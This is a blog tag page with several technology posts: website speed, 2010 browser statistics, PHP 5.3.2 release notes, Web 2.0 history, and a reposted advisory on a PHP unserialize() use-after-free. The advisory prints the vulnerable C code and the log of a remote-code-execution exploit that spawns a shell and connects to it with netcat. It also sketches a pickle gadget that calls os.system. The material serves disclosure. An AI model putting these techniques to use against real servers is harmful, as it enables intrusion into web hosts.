Posts Tagged ‘Technology’

Ways to Optimize Your Website Speed

Website speed has long been an underestimated ranking factor, and to some extent it still is. However, with Google campaigning for a faster internet, it makes sense that the search engine considers page loading speed when analysing a site.

Slow websites are an exasperating experience. Many visitors will be put off enough by the inconvenience to take their business elsewhere. Sluggish loading does not merely irritate users; it also contributes to reduced conversion rates and lower traffic levels.

For these reasons, it is vital for any web designer to do whatever can be done to speed up their site. The obvious irritation of a lethargic website should be reason enough for developers to address the problem, but the knowledge that Google considers speed when ranking websites gives webmasters an added incentive.

Although not deemed as influential as, say, fresh content or the relevance of backlinks, the speed factor could provide the edge that leaves competitors eating your dust in the race for pole position.

To achieve a faster loading time, several adjustments can be made. First, ensure that no page is overloaded with content: common sense dictates that the larger the page, the longer it takes to load.

In terms of images, make sure they use no more data than needed; by cropping and resizing an image before uploading it to the site, you can ensure the amount of data is not excessive for the required effect.

On the technical side, monitoring your site via Google Analytics is highly beneficial. By keeping track of traffic levels and visitor activity, you can gauge the general performance of your web pages and check that your SEO web design techniques are performing at their optimum.

Another advantageous alteration to consider is caching. Content that is a staple part of your site and rarely, if ever, changes can be cached to reduce loading time. Once a piece of data is cached, the browser can reuse the stored copy rather than downloading it every time a page is opened. This reduces the number of HTTP requests, which in turn reduces the load time.
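As a rough sketch of one part of this mechanism (simplified Python, not tied to any particular server framework; the function name and page content are invented), a cache-aware server can answer a browser's revalidation request with a tiny "304 Not Modified" instead of resending the whole page:

```python
# Simplified sketch of browser-cache revalidation (invented example).
from datetime import datetime, timezone
from email.utils import format_datetime, parsedate_to_datetime

def respond(last_modified, if_modified_since):
    # A cache-aware server: if the browser already holds a copy at
    # least as new as ours, answer 304 with an empty body.
    if if_modified_since is not None:
        cached = parsedate_to_datetime(if_modified_since)
        if last_modified <= cached:
            return 304, b""          # nothing to download again
    return 200, b"<html>...full page content...</html>"

modified = datetime(2010, 7, 1, tzinfo=timezone.utc)

# First visit: nothing cached, full download.
status, body = respond(modified, None)

# Repeat visit: the browser revalidates with the stored timestamp
# and the body is not transferred a second time.
status2, body2 = respond(modified, format_datetime(modified))
```

With suitable Expires or Cache-Control headers the browser can skip even this revalidation request, eliminating the HTTP round trip entirely.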

With many tools available to help you monitor the speed of your website, such as Firebug’s Page Speed add-on or the Speed Tracer application, you are not alone in carrying out these optimizations.

Please read the detailed PDF, “Best Practices to Optimize Your Website”.



The IE Nightmare Will Be Over Soon!


We are now past the middle of the year, and the 2010 browser statistics below make interesting reading for end users.

The number of Internet Explorer users is dropping dramatically. Surprisingly, 7.2% of people are still using IE6.

(IE6 is very vulnerable and at high risk of attack from the latest malware and browser exploits.)

Browser Statistics

2010 IE8 IE7 IE6 Firefox Chrome Safari Opera
July 15.6% 7.6% 7.2% 46.4% 16.7% 3.4% 2.3%
June 15.7% 8.1% 7.2% 46.6% 15.9% 3.6% 2.1%
May 16.0% 9.1% 7.1% 46.9% 14.5% 3.5% 2.2%
April 16.2% 9.3% 7.9% 46.4% 13.6% 3.7% 2.2%
March 15.3% 10.7% 8.9% 46.2% 12.3% 3.7% 2.2%
February 14.7% 11.0% 9.6% 46.5% 11.6% 3.8% 2.1%
January 14.3% 11.7% 10.2% 46.3% 10.8% 3.7% 2.2%

Internet Explorer Version Statistics

The following table is a breakdown of the Internet Explorer numbers from the browser statistics above:

2010 Total IE 8 IE 7 IE 6
July 30.4 % 15.6 % 7.6 % 7.2 %
June 31.0 % 15.7 % 8.1 % 7.2 %
May 32.2 % 16.0 % 9.1 % 7.1 %
April 33.4 % 16.2 % 9.3 % 7.9 %
March 34.9 % 15.3 % 10.7 % 8.9 %
February 35.3 % 14.7 % 11.0 % 9.6 %
January 36.2 % 14.3 % 11.7 % 10.2 %


This is a very good sign for HTML designers and web developers. The industry wastes time and revenue fixing IE issues; it has been a real nightmare for HTML designers to fix layouts across the different versions of Internet Explorer.

This year people have started using HTML5 and CSS3. Support for HTML5 and CSS3 is very limited in IE6, IE7, and IE8; the new version, IE9, does have HTML5/CSS3 support.

Though Google had long been warning its users to stop using IE6, it finally put its foot down, saying:

“In order to continue to improve our products and deliver more sophisticated features and performance, we are harnessing some of the latest improvements in web browser technology.  This includes faster JavaScript processing and new standards like HTML5.  As a result, over the course of 2010, we will be phasing out support for Microsoft Internet Explorer 6.0 as well as other older browsers that are not supported by their own manufacturers. Later in 2010, we will start to phase out support for these browsers for Google Mail and Google Calendar.”

So let’s hope for the best: by the end of the year we may really be free of this IE nightmare!

MOPS-2010-061: PHP SplObjectStorage Deserialization Use-After-Free Vulnerability

A use-after-free vulnerability was discovered in the deserialization of SplObjectStorage objects that can be abused to leak arbitrary memory blocks or to execute arbitrary code remotely.

Affected versions

Affected is PHP 5.2 <= 5.2.13
Affected is PHP 5.3 <= 5.3.2




This vulnerability was disclosed by Stefan Esser of SektionEins GmbH during the SyScan Singapore 2010 security conference.

Detailed information

PHP’s unserialize() function has had many memory corruption and use-after-free vulnerabilities in the past, so it should be obvious by now that exposing it to user-supplied input is not a good idea. However, many widespread PHP applications directly unserialize() the content of cookies or POST requests. Closed-source PHP applications developed for websites, especially, often use serialized user input.

In addition, the APIs of popular services/applications like WordPress transfer serialized data over insecure HTTP connections, which makes them vulnerable to unserialize() exploits via man-in-the-middle attacks. Even more applications deserialize the content of database fields, which means SQL injection vulnerabilities can be used to launch attacks against unserialize(). As demonstrated by the MOPS-2010-060 vulnerability, even simple arbitrary writes to the $_SESSION variable can result in attacks against unserialize(). And the story does not stop here: many more applications deserialize the content of cache files, so arbitrary file overwrite vulnerabilities can be used to launch attacks against unserialize() and lead to arbitrary code execution, even when everything except the cache files is unwritable.
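This class of risk is not unique to PHP. As an illustrative analogy in Python (the Payload class and the harmless list() call below are invented for demonstration), the pickle module behaves much like unserialize(): merely decoding a byte stream invokes a callable chosen by whoever produced the stream.

```python
# Why deserializing untrusted input is dangerous, shown with Python's
# pickle module as an analogy to PHP's unserialize().
import pickle

class Payload:
    # __reduce__ tells pickle how to rebuild the object: a callable
    # plus its arguments. An attacker controls both, so in a real
    # attack this could be (os.system, ("malicious command",)).
    def __reduce__(self):
        return (list, ("pwned",))

blob = pickle.dumps(Payload())   # the "serialized user input"
result = pickle.loads(blob)      # decoding alone calls list("pwned")
```

The point is that deserialization is not a passive parsing step; it reconstructs live objects, and any flaw or feature in that machinery is reachable the moment attacker-controlled bytes are fed to it.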

While the core of the unserialize() function has been audited very heavily over the last years, the SPL objects shipped with PHP that support deserialization have not been audited much. It was therefore no surprise to find a use-after-free vulnerability in the SplObjectStorage implementation that is very similar to a vulnerability in the unserialize() core that was fixed in 2004 and also disclosed by us.

In PHP 5.3.x the actual vulnerability is caused by the spl_object_storage_attach() function removing previously inserted extra data if the same object is inserted twice.

void spl_object_storage_attach(spl_SplObjectStorage *intern, zval *obj, zval *inf TSRMLS_DC) /* {{{ */
{
    spl_SplObjectStorageElement *pelement, element;
    pelement = spl_object_storage_get(intern, obj TSRMLS_CC);
    if (inf) {
        Z_ADDREF_P(inf);
    } else {
        ALLOC_INIT_ZVAL(inf);
    }
    if (pelement) {
        /* duplicate entry: the previously attached extra data is
           freed here, which is the root of the use-after-free */
        zval_ptr_dtor(&pelement->inf);
        pelement->inf = inf;
        return;
    }
    Z_ADDREF_P(obj);
    element.obj = obj;
    element.inf = inf;
#if HAVE_PACKED_OBJECT_VALUE
    zend_hash_update(&intern->storage, (char*)&Z_OBJVAL_P(obj), sizeof(zend_object_value), &element, sizeof(spl_SplObjectStorageElement), NULL);
#else
    {
        zend_object_value zvalue;
        memset(&zvalue, 0, sizeof(zend_object_value));
        zvalue.handle = Z_OBJ_HANDLE_P(obj);
        zvalue.handlers = Z_OBJ_HT_P(obj);
        zend_hash_update(&intern->storage, (char*)&zvalue, sizeof(zend_object_value), &element, sizeof(spl_SplObjectStorageElement), NULL);
    }
#endif
} /* }}} */

Because the extra data attached to the previously inserted object is freed when a duplicate entry is encountered, it can be used in a use-after-free attack that, as demonstrated during SyScan, can leak arbitrary pieces of memory and/or execute arbitrary code.

In PHP 5.2.x the vulnerability is similar but not identical, because there SplObjectStorage is only an object set and does not store extra data. However, inserting a double value with the same binary representation as an object handle results in the object being freed early, which again allows similar use-after-free exploits. Due to the nature of this type-confusion attack, the vulnerability is only exploitable on 32-bit systems for PHP 5.2.x. This restriction does not apply to PHP 5.3.x.

Proof of concept, exploit or instructions to reproduce

Due to the dangerous nature of the vulnerability, exploit code will not be published. However, the following is the output of a working exploit in action.

$ ./ -h http://t.testsystem/
PHP unserialize() Remote Code Execution Exploit (TikiWiki Version)
Copyright (C) 2010 Stefan Esser/SektionEins GmbH

[+] Connecting to determine wordsize
[+] Wordsize is 32 bit
[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x
[+] PHP version is 5.3.x
[+] Connecting to determine SPLObjectStorage version
[+] PHP version >= 5.3.2
[+] Determining endianess of system
[+] System is little endian
[+] Leaking address of std_object_handlers
[+] Found std_object_handlers address to be 0xb76e84a0
[+] Leaking std_object_handlers
[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)
[+] Optimized to 0xb74008f0
[+] Scanning for executable header
[+] ELF header found at 0xb73ab000
[+] Retrieving and parsing ELF header
[+] Retrieving program headers
[+] Retrieving ELF string table
[+] Looking up ELF symbol: executor_globals
[+] Found executor_globals at 0xb76fe280
[+] Looking up ELF symbol: php_execute_script
[+] Found php_execute_script at 0xb75386c0
[+] Looking up ELF symbol: zend_eval_string
[+] Found zend_eval_string at 0xb7586580
[+] Searching JMPBUF in executor_globals
[+] Found JMPBUF at 0xbfcc64b4
[+] Attempt to crack JMPBUF
[+] Determined stored EIP value 0xb753875a from pattern match
[+] Calculated XORER 0x68ab06ea
[+] Unmangled stored ESP is 0xbfcc5470
[+] Checking memory infront of JMPBUF for overwriting possibilities
[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline
[+] Returning into PHP… Spawning a shell at port 4444

$ nc t.testsystem 4444
Welcome to the PHPShell 5/22/2010 1:27 am

system(“uname -a”);
Linux fedora13x86 #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linux
uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0


This vulnerability was disclosed on June 18th, 2010 at the SyScan Singapore 2010 security conference.

Among the audience of the conference was a member of the Red Hat Linux Security Team, who immediately forwarded the information to colleagues at Red Hat; they patched their version of PHP and shared the information and patch with the PHP developers.

Due to the nature of the bug, the exploit is very similar across different applications using unserialize(); only small modifications are required.

The exploitation path demonstrated at the SyScan conference will not work against PHP installations protected by the Suhosin patch. Therefore only people who have chosen to be less secure (i.e. running PHP without the Suhosin patch applied) are in immediate danger. However, the vulnerability is exploitable on systems running Suhosin too, with a more complicated exploit.

PHP 5.3.2 Released!

The PHP development team is proud to announce the immediate release of PHP 5.3.2. This is a maintenance release in the 5.3 series, which includes a large number of bug fixes.

Security Enhancements and Fixes in PHP 5.3.2:

  • Improved LCG entropy. (Rasmus, Samy Kamkar)
  • Fixed safe_mode validation inside tempnam() when the directory path does not end with a “/”. (Martin Jansen)
  • Fixed a possible open_basedir/safe_mode bypass in the session extension identified by Grzegorz Stachowiak. (Ilia)

Key Bug Fixes in PHP 5.3.2 include:

  • Added support for SHA-256 and SHA-512 to PHP’s crypt().
  • Added protection for $_SESSION from interrupt corruption and improved “session.save_path” check.
  • Fixed bug #51059 (crypt crashes when invalid salt are given).
  • Fixed bug #50940 (Custom content-length set incorrectly in Apache SAPIs).
  • Fixed bug #50847 (strip_tags() removes all tags greater than 1023 bytes long).
  • Fixed bug #50723 (Bug in garbage collector causes crash).
  • Fixed bug #50661 (DOMDocument::loadXML does not allow UTF-16).
  • Fixed bug #50632 (filter_input() does not return default value if the variable does not exist).
  • Fixed bug #50540 (Crash while running ldap_next_reference test cases).
  • Fixed bug #49851 (http wrapper breaks on 1024 char long headers).
  • Over 60 other bug fixes.

What is Web 2.0?

The term “Web 2.0” is commonly associated with web applications that facilitate interactive information sharing, interoperability, user-centered design and collaboration on the World Wide Web. A Web 2.0 site allows its users to interact with each other as contributors to the website’s content, in contrast to websites where users are limited to the passive viewing of information that is provided to them. Examples of Web 2.0 include web-based communities, hosted services, web applications, social-networking sites, video-sharing sites, wikis, blogs, mashups, and folksonomies.

The term is closely associated with Tim O’Reilly because of the O’Reilly Media Web 2.0 conference in 2004. Although the term suggests a new version of the World Wide Web, it does not refer to an update to any technical specifications, but rather to cumulative changes in the ways software developers and end-users use the Web. Whether Web 2.0 is qualitatively different from prior web technologies has been challenged by World Wide Web inventor Tim Berners-Lee, who called the term a “piece of jargon”, precisely because he specifically intended the Web to embody these values in the first place.

History: From Web 1.0 to 2.0

The term “Web 2.0” was coined in 1999 by Darcy DiNucci. In her article, “Fragmented Future,” DiNucci writes:

The Web we know now, which loads into a browser window in essentially static screenfulls, is only an embryo of the Web to come. The first glimmerings of Web 2.0 are beginning to appear, and we are just starting to see how that embryo might develop. The Web will be understood not as screenfulls of text and graphics but as a transport mechanism, the ether through which interactivity happens. It will appear on your computer screen, on your TV set, your car dashboard, your cell phone, hand-held game machines, maybe even your microwave oven.

Her use of the term deals mainly with Web design and aesthetics; she argues that the Web is “fragmenting” due to the widespread use of portable Web-ready devices. Her article is aimed at designers, reminding them to code for an ever-increasing variety of hardware. As such, her use of the term hints at – but does not directly relate to – the current uses of the term.

The term did not resurface until 2003, when authors began focusing on the concepts currently associated with it, where, as Scott Dietzen puts it, “the Web becomes a universal, standards-based integration platform”.

In 2004, the term began its rise in popularity when O’Reilly Media and MediaLive hosted the first Web 2.0 conference. In their opening remarks, John Battelle and Tim O’Reilly outlined their definition of the “Web as Platform”, where software applications are built upon the Web as opposed to upon the desktop. The unique aspect of this migration, they argued, is that “customers are building your business for you”. They argued that the activities of users generating content (in the form of ideas, text, videos, or pictures) could be “harnessed” to create value.

O’Reilly et al. contrasted Web 2.0 with what they called “Web 1.0”. They associated Web 1.0 with the business models of Netscape and the Encyclopedia Britannica Online. For example,

Netscape framed “the web as platform” in terms of the old software paradigm: their flagship product was the web browser, a desktop application, and their strategy was to use their dominance in the browser market to establish a market for high-priced server products. Control over standards for displaying content and applications in the browser would, in theory, give Netscape the kind of market power enjoyed by Microsoft in the PC market. Much like the “horseless carriage” framed the automobile as an extension of the familiar, Netscape promoted a “webtop” to replace the desktop, and planned to populate that webtop with information updates and applets pushed to the webtop by information providers who would purchase Netscape servers.

In short, Netscape focused on creating software, updating it on occasion, and distributing it to the end users. O’Reilly contrasted this with Google, a company which did not at the time focus on producing software, such as a browser, but instead focused on providing a service based on data. The data being the links Web page authors make between sites. Google exploits this user-generated content to offer Web search based on reputation through its “page rank” algorithm. Unlike software, which undergoes scheduled releases, such services are constantly updated, a process called “the perpetual beta”.

A similar difference can be seen between the Encyclopedia Britannica Online and Wikipedia: while the Britannica relies upon experts to create articles and releases them periodically in publications, Wikipedia relies on trust in anonymous users to constantly and quickly build content. Wikipedia is not based on expertise but rather an adaptation of the open source software adage “given enough eyeballs, all bugs are shallow”, and it produces and updates articles constantly.

O’Reilly’s Web 2.0 conferences have been held every year since 2004, attracting entrepreneurs, large companies, and technology reporters. In terms of the lay public, the term Web 2.0 was largely championed by bloggers and by technology journalists, culminating in the 2006 TIME magazine Person of The Year – “You”. That is, TIME selected the masses of users who were participating in content creation on social networks, blogs, wikis, and media sharing sites. The cover story author Lev Grossman explains:

It’s a story about community and collaboration on a scale never seen before. It’s about the cosmic compendium of knowledge Wikipedia and the million-channel people’s network YouTube and the online metropolis MySpace. It’s about the many wresting power from the few and helping one another for nothing and how that will not only change the world, but also change the way the world changes.

Since that time, Web 2.0 has found a place in the lexicon; in 2009 Global Language Monitor declared it to be the one-millionth English word.


Flickr, a Web 2.0 web site that allows its users to upload and share photos

Web 2.0 websites allow users to do more than just retrieve information. They can build on the interactive facilities of “Web 1.0” to provide “Network as platform” computing, allowing users to run software-applications entirely through a browser. Users can own the data on a Web 2.0 site and exercise control over that data. These sites may have an “Architecture of participation” that encourages users to add value to the application as they use it.

The concept of Web-as-participation-platform captures many of these characteristics. Bart Decrem, a founder and former CEO of Flock, calls Web 2.0 the “participatory Web” and regards the Web-as-information-source as Web 1.0.

The impossibility of excluding group-members who don’t contribute to the provision of goods from sharing profits gives rise to the possibility that rational members will prefer to withhold their contribution of effort and free-ride on the contribution of others. This requires what is sometimes called Radical Trust by the management of the website. According to Best, the characteristics of Web 2.0 are: rich user experience, user participation, dynamic content, metadata, web standards and scalability. Further characteristics, such as openness, freedom and collective intelligence by way of user participation, can also be viewed as essential attributes of Web 2.0.

Technology overview

Web 2.0 draws together the capabilities of client- and server-side software, content syndication and the use of network protocols. Standards-oriented web browsers may use plug-ins and software extensions to handle the content and the user interactions. Web 2.0 sites provide users with information storage, creation, and dissemination capabilities that were not possible in the environment now known as “Web 1.0”.

Web 2.0 websites typically include some of the following features and techniques. Andrew McAfee used the acronym SLATES to refer to them:


Search: Finding information through keyword search.

Links: Connecting information into a meaningful information ecosystem using the model of the Web, and providing low-barrier social tools.

Authoring: The ability to create and update content leads to the collaborative work of many rather than just a few web authors. In wikis, users may extend, undo and redo each other’s work. In blogs, posts and the comments of individuals build up over time.

Tags: Categorization of content by users adding “tags” – short, usually one-word descriptions – to facilitate searching, without dependence on pre-made categories. Collections of tags created by many users within a single system may be referred to as “folksonomies” (i.e., folk taxonomies).

Extensions: Software that makes the Web an application platform as well as a document server.

Signals: The use of syndication technology, such as RSS, to notify users of content changes.
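The tagging pattern described above is easy to sketch as a data structure. This minimal Python example (the item names and tags are invented) indexes tags both ways, so items can be found by tag without any pre-made category tree:

```python
# A minimal folksonomy: free-form tags applied by many users,
# indexed in both directions for searching.
from collections import defaultdict

tags_by_item = defaultdict(set)
items_by_tag = defaultdict(set)

def tag(user, item, label):
    """Record that `user` applied tag `label` to `item`."""
    tags_by_item[item].add(label)
    items_by_tag[label].add(item)

tag("alice", "photo42", "sunset")
tag("bob",   "photo42", "beach")
tag("bob",   "photo99", "sunset")

# Searching by tag needs no predefined taxonomy:
sunset_items = items_by_tag["sunset"]
```

The vocabulary emerges from the users themselves, which is exactly what distinguishes a folksonomy from a curated taxonomy.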

While SLATES forms the basic framework of Enterprise 2.0, it does not contradict all of the higher level Web 2.0 design patterns and business models. And in this way, the new Web 2.0 report from O’Reilly is quite effective and diligent in interweaving the story of Web 2.0 with the specific aspects of Enterprise 2.0. It includes discussions of self-service IT, the long tail of enterprise IT demand, and many other consequences of the Web 2.0 era in the enterprise. The report also makes many sensible recommendations around starting small with pilot projects and measuring results, among a fairly long list.

How it works

The client-side/web browser technologies typically used in Web 2.0 development are Asynchronous JavaScript and XML (Ajax), Adobe Flash and the Adobe Flex framework, and JavaScript/Ajax frameworks such as Yahoo! UI Library, Dojo Toolkit, MooTools, and jQuery. Ajax programming uses JavaScript to upload and download new data from the web server without undergoing a full page reload.

To let the user continue interacting with the page, requests going to the server are separated from the data coming back (hence “asynchronous”). Otherwise, the user would have to wait for the data to return before doing anything else on the page, just as they must wait for a full page reload. This also improves the overall performance of the site, since sending requests can complete quickly, independent of the blocking and queueing required to send data back to the client.

The data fetched by an Ajax request is typically formatted in XML or JSON (JavaScript Object Notation) format, two widely used structured data formats. Since both of these formats are natively understood by JavaScript, a programmer can easily use them to transmit structured data in their web application. When this data is received via Ajax, the JavaScript program then uses the Document Object Model (DOM) to dynamically update the web page based on the new data, allowing for a rapid and interactive user experience. In short, using these techniques, Web designers can make their pages function like desktop applications. For example, Google Docs uses this technique to create a Web-based word processor.
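The convenience of JSON as a wire format can be seen in this server-side sketch in Python (the browser side would be JavaScript; the field names and values are invented): the payload travels as plain text but decodes straight back into structured data the page can use to update the DOM.

```python
# A sketch of the kind of payload an Ajax request might receive.
import json

# Server encodes structured data as a JSON string...
payload = json.dumps({"user": "alice", "unread": 3,
                      "messages": ["hi", "lunch?"]})

# ...which is plain text on the wire, yet decodes losslessly
# back into nested structures on the receiving side.
decoded = json.loads(payload)
```

In the browser, JavaScript's native understanding of this format is what makes it so well suited to Ajax: no extra parsing layer is needed before the data can drive DOM updates.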

Adobe Flex is another technology often used in Web 2.0 applications. Compared to JavaScript libraries like jQuery, Flex makes it easier for programmers to populate large data grids, charts, and other heavy user interactions. Applications programmed in Flex are compiled and displayed as Flash within the browser. As a widely available plugin independent of W3C (World Wide Web Consortium, the governing body of web standards and protocols) standards, Flash is capable of many things that are not currently possible in HTML, the language used to construct web pages. Of Flash’s many capabilities, the most commonly used in Web 2.0 is its ability to play audio and video files. This has allowed for the creation of Web 2.0 sites where video media is seamlessly integrated with standard HTML.

In addition to Flash and Ajax, JavaScript/Ajax frameworks have recently become a very popular means of creating Web 2.0 sites. At their core, these frameworks do not use technology any different from JavaScript, Ajax, and the DOM. What frameworks do is smooth over inconsistencies between web browsers and extend the functionality available to developers. Many of them also come with customizable, prefabricated ‘widgets’ that accomplish such common tasks as picking a date from a calendar, displaying a data chart, or making a tabbed panel.

On the server side, Web 2.0 uses many of the same technologies as Web 1.0. Languages such as PHP, Ruby, ColdFusion, Perl, Python, JSP and ASP are used by developers to dynamically output data using information from files and databases. What has begun to change in Web 2.0 is the way this data is formatted. In the early days of the Internet, there was little need for different websites to communicate with each other and share data. In the new “participatory web”, however, sharing data between sites has become an essential capability. To share its data with other sites, a web site must be able to generate output in machine-readable formats such as XML, RSS, and JSON. When a site’s data is available in one of these formats, another website can use it to integrate a portion of that site’s functionality into itself, linking the two together. When this design pattern is implemented, it ultimately leads to data that is both easier to find and more thoroughly categorized, a hallmark of the philosophy behind the Web 2.0 movement.


The popularity of the term Web 2.0, along with the increasing use of blogs, wikis, and social networking technologies, has led many in academia and business to coin a flurry of 2.0s, including Library 2.0, Social Work 2.0, Enterprise 2.0, PR 2.0, Classroom 2.0, Publishing 2.0, Medicine 2.0, Telco 2.0, Travel 2.0, Government 2.0, and even Porn 2.0. Many of these 2.0s refer to Web 2.0 technologies as the source of the new version in their respective disciplines and areas. For example, in the Talis white paper “Library 2.0: The Challenge of Disruptive Innovation”, Paul Miller argues

Blogs, wikis and RSS are often held up as exemplary manifestations of Web 2.0. A reader of a blog or a wiki is provided with tools to add a comment or even, in the case of the wiki, to edit the content. This is what we call the Read/Write Web. Talis believes that Library 2.0 means harnessing this type of participation so that libraries can benefit from increasingly rich collaborative cataloguing efforts, such as including contributions from partner libraries as well as adding rich enhancements, such as book jackets or movie files, to records from publishers and others.

Here, Miller links Web 2.0 technologies and the culture of participation that they engender to the field of library science, supporting his claim that there is now a “Library 2.0”. Many of the other proponents of new 2.0s mentioned here use similar methods.

Source: Wikipedia